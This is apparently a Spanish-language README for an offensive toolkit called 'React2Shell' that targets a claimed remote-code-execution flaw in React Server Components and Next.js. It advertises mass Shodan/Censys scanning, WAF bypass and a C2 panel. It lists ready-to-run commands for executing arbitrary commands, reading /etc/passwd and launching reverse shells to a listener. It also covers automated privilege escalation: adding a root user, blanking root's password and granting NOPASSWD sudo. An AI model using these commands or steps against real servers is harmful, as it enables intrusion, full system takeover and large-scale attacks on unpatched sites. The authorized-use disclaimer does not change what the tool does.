Elite exploitation toolkit para CVE-2025-55182 (RCE en React Server Components). Payloads polimórficos asíncronos, bypass avanzado de WAF/CDN, rotación de proxies, escaneo masivo en Shodan/Censys, auto-pwn + shells inversas, plantillas Nuclei, laboratorio K8s y panel C2. Creado por Sudeepa Wanigarathna – estrictamente para uso autorizado en red team y pruebas de penetración.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Framework de explotación de nivel profesional para la vulnerabilidad de ejecución remota de código (RCE) en Server Actions de Next.js (React2Shell). Demuestra la cadena de ataque completa, desde el acceso inicial hasta la escalada de privilegios a root.
Capacidades:
# Verificar vulnerabilidad
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Ejecutar comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Explotación completa: RCE → Enumeración → Acceso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Motor de explotación principal (400+ líneas)
├── demo_exploit.py # Cadena de ataque automatizada (290+ líneas)
├── interactive_shell.py # Shell interactivo (280+ líneas)
├── reverse_shell_handler.py # Listener de reverse shell (180+ líneas)
├── post_exploit/
│ ├── linux_enum.py # Enumeración del sistema (330+ líneas)
│ ├── priv_esc.py # Escalada de privilegios (320+ líneas)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Documentación completa de uso
├── QUICKSTART.md # Referencia rápida
└── BANNER.txt
# Verificación de vulnerabilidad
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Ejecutar comandos
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Diferentes variantes de payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Con ofuscación
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Lanzar shell
python3 interactive_shell.py --target http://127.0.0.1:3000
# Comandos disponibles:
# - execute <cmd> : Ejecutar comando de shell
# - enum : Ejecutar enumeración completa
# - escalate : Intentar escalada de privilegios
# - upload <local> <remote> : Subir archivo
# - download <remote> <local>: Descargar archivo
# - shell <lhost> <lport>: Desplegar reverse shell
# - info : Mostrar información de la sesión
# - exit : Salir
# Terminal 1: Iniciar listener
python3 reverse_shell_handler.py --lport 4444
# Terminal 2: Desplegar shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Cadena completa: Descubrimiento → RCE → Enumeración → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
El framework implementa una cadena de explotación completa de 6 pasos:
id/etc/shadow y listando /rootBinarios SUID (GTFOBins)
Archivos /etc Escribibles
/etc/passwd - Añadir nuevo usuario root/etc/shadow - Limpiar la contraseña de root/etc/sudoers - Otorgar sudo NOPASSWDEscape de Docker
Exploits del Kernel
Capacidades de Linux
pip install -r requirements.txt
Dependencias:
EXPLOITATION_GUIDE.md - Guía de uso completa con ejemplosQUICKSTART.md - Referencia rápida para comandos comunesADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito por escrito.
El autor no es responsable del mal uso de esta herramienta. Úsala bajo tu propio riesgo.
Este framework está diseñado para:
Licencia MIT (Solo con Fines Educativos)
Sudeepa Wanigarathna
Versión: 1.0
Última Actualización: Diciembre 2025
Para instrucciones de uso detalladas, consulta EXPLOITATION_GUIDE.md